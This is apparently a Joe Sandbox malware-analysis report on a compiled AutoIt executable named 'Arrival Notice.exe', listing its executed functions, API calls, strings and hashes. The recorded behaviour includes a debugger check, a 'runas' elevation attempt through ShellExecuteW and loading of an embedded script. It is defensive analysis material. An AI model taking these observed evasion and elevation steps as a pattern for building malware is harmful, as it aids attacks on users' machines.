Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	27

Executed Functions

Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA

Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Arrival Notice.exe,00000104,?), ref: 00401F4C
Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C

IsDebuggerPresent.KERNEL32 ref: 0040D5B6
GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Arrival Notice.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625

Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5

SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
ShellExecuteW.SHELL32(00000000), ref: 0042E2B9

Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D

Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE

Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7

Strings

C:\Users\user\Desktop\Arrival Notice.exe, xrefs: 0040D5EB, 0040D61A, 0040D631, 0042E281
runas, xrefs: 0042E2AD, 0042E2DC
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
String ID: C:\Users\user\Desktop\Arrival Notice.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
API String ID: 2495805114-1228236024
Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0040E52A

Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193

GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
FreeLibrary.KERNEL32(?), ref: 0040E642
FreeLibrary.KERNEL32(?), ref: 0040E654

Strings

0SH, xrefs: 0040E55C

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
String ID: 0SH
API String ID: 3363477735-851180471
Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A

Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED

Strings

uxtheme.dll, xrefs: 0040EBD6
IsThemeActive, xrefs: 0040EBE7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsThemeActive$uxtheme.dll
API String ID: 2574300362-3542929980
Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768

Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
FindClose.KERNEL32(00000000), ref: 004339EB

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA

Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
Sleep.KERNEL32(0000000A,?), ref: 004094D1
TranslateMessage.USER32(?), ref: 00409556
DispatchMessageW.USER32(?), ref: 00409561
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574

Strings

@GUI_CTRLHANDLE, xrefs: 0042DB42
@GUI_WINHANDLE, xrefs: 0042DAFF
@GUI_CTRLID, xrefs: 0042DAC7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Message$Peek$DispatchSleepTranslate
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
API String ID: 1762048999-758534266
Opcode ID: 8cea7f91f3b75b6f85025ce858aa427668c24f2ba4b6db7d37d704ff3052bd02
Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
Opcode Fuzzy Hash: 8cea7f91f3b75b6f85025ce858aa427668c24f2ba4b6db7d37d704ff3052bd02
Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66

_fseek.LIBCMT ref: 00452B3B
__wsplitpath.LIBCMT ref: 00452B9B
_wcscpy.LIBCMT ref: 00452BB0
_wcscat.LIBCMT ref: 00452BC5
__wsplitpath.LIBCMT ref: 00452BEF
_wcscat.LIBCMT ref: 00452C07
_wcscat.LIBCMT ref: 00452C1C
__fread_nolock.LIBCMT ref: 00452C53
__fread_nolock.LIBCMT ref: 00452C64
__fread_nolock.LIBCMT ref: 00452C83
__fread_nolock.LIBCMT ref: 00452C94
__fread_nolock.LIBCMT ref: 00452CB5
__fread_nolock.LIBCMT ref: 00452CC6
__fread_nolock.LIBCMT ref: 00452CD7
__fread_nolock.LIBCMT ref: 00452CE8

Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831

__fread_nolock.LIBCMT ref: 00452D78

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
String ID:
API String ID: 2054058615-0
Opcode ID: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
Opcode Fuzzy Hash: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0046E467
\, xrefs: 0046E293

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID: >>>AUTOIT SCRIPT<<<$\
API String ID: 0-1896584978
Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99

Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Arrival Notice.exe,00000104,?), ref: 00401F4C

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

__wcsicoll.LIBCMT ref: 00402007
__wcsicoll.LIBCMT ref: 0040201D
__wcsicoll.LIBCMT ref: 00402033

Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B

__wcsicoll.LIBCMT ref: 00402049
_wcscpy.LIBCMT ref: 0040207C
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Arrival Notice.exe,00000104), ref: 00428B5B

Strings

/ErrorStdOut, xrefs: 00402002
C:\Users\user\Desktop\Arrival Notice.exe, xrefs: 00401F46, 00401F52, 00401F65, 00402077, 00402095, 00428B48, 00428BA0
/AutoIt3ExecuteScript, xrefs: 00402044
/AutoIt3OutputDebug, xrefs: 00402018
/AutoIt3ExecuteLine, xrefs: 0040202E
CMDLINE, xrefs: 00401F9D
CMDLINERAW, xrefs: 00401F74

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Arrival Notice.exe$CMDLINE$CMDLINERAW
API String ID: 3948761352-2136228339
Opcode ID: bdb5ac018524820467b0179db70ca73b3ddff588823d545afa360bb69cd24784
Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
Opcode Fuzzy Hash: bdb5ac018524820467b0179db70ca73b3ddff588823d545afa360bb69cd24784
Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__fread_nolock.LIBCMT ref: 0045273E
__fread_nolock.LIBCMT ref: 00452780
__fread_nolock.LIBCMT ref: 0045279E
_wcscpy.LIBCMT ref: 004527D2
__fread_nolock.LIBCMT ref: 004527E2
__fread_nolock.LIBCMT ref: 00452800
_wcscpy.LIBCMT ref: 00452831
_fseek.LIBCMT ref: 0045286B
__fread_nolock.LIBCMT ref: 0045287E
_fseek.LIBCMT ref: 00452897

Strings

D)E, xrefs: 0045281C, 00452828
D)E, xrefs: 00452878, 00452883, 0045287D, 00452893, 00452896
FILE, xrefs: 00452759

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __fread_nolock$_fseek_wcscpy
String ID: D)E$D)E$FILE
API String ID: 3888824918-361185794
Opcode ID: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
Opcode Fuzzy Hash: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
__wsplitpath.LIBCMT ref: 0040E41C

Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50

_wcsncat.LIBCMT ref: 0040E433
__wmakepath.LIBCMT ref: 0040E44F

Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4

Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651

_wcscpy.LIBCMT ref: 0040E487

Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD

_wcscat.LIBCMT ref: 00427541
_wcslen.LIBCMT ref: 00427551
_wcslen.LIBCMT ref: 00427562
_wcscat.LIBCMT ref: 0042757C
_wcsncpy.LIBCMT ref: 004275BC

Strings

Include, xrefs: 0040E42D
\, xrefs: 0042756A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
String ID: Include$\
API String ID: 3173733714-3429789819
Opcode ID: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
Opcode Fuzzy Hash: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fseek.LIBCMT ref: 0045292B

Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831

__fread_nolock.LIBCMT ref: 00452961
__fread_nolock.LIBCMT ref: 00452971
__fread_nolock.LIBCMT ref: 0045298A
__fread_nolock.LIBCMT ref: 004529A5
_fseek.LIBCMT ref: 004529BF
_malloc.LIBCMT ref: 004529CA
_malloc.LIBCMT ref: 004529D6
__fread_nolock.LIBCMT ref: 004529E7
_free.LIBCMT ref: 00452A17
_free.LIBCMT ref: 00452A20

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __fread_nolock$_free_fseek_malloc_wcscpy
String ID:
API String ID: 1255752989-0
Opcode ID: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
Opcode Fuzzy Hash: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004104C3
RegisterClassExW.USER32(00000030), ref: 004104ED
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
LoadIconW.USER32(00400000,000000A9), ref: 00410542
ImageList_ReplaceIcon.COMCTL32(00AD0E00,000000FF,00000000), ref: 00410552

Strings

AutoIt v3 GUI, xrefs: 004104DF
+, xrefs: 004104AC
0, xrefs: 004104A5
TaskbarCreated, xrefs: 004104F3

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
